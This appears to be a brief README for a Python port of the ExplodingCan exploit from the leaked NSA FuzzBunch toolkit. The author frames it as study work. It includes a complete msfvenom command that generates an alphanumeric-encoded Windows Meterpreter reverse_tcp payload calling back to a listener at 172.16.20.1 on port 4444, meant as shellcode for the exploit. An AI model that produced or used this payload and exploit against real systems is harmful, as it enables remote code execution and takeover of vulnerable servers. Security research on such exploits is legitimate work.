An implementation of ExplodingCan's exploit extracted from FuzzBunch, the "Metasploit" of the NSA.
Months ago I needed to study this exploit, and finally I implemented it in python.
The shellcode must be in alphanumeric format due to the limitations of the bug. For example we can use msfvenom
(metasploit) with the alpha_mixed
encoder.
$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=172.16.20.1 LPORT=4444 >shellcode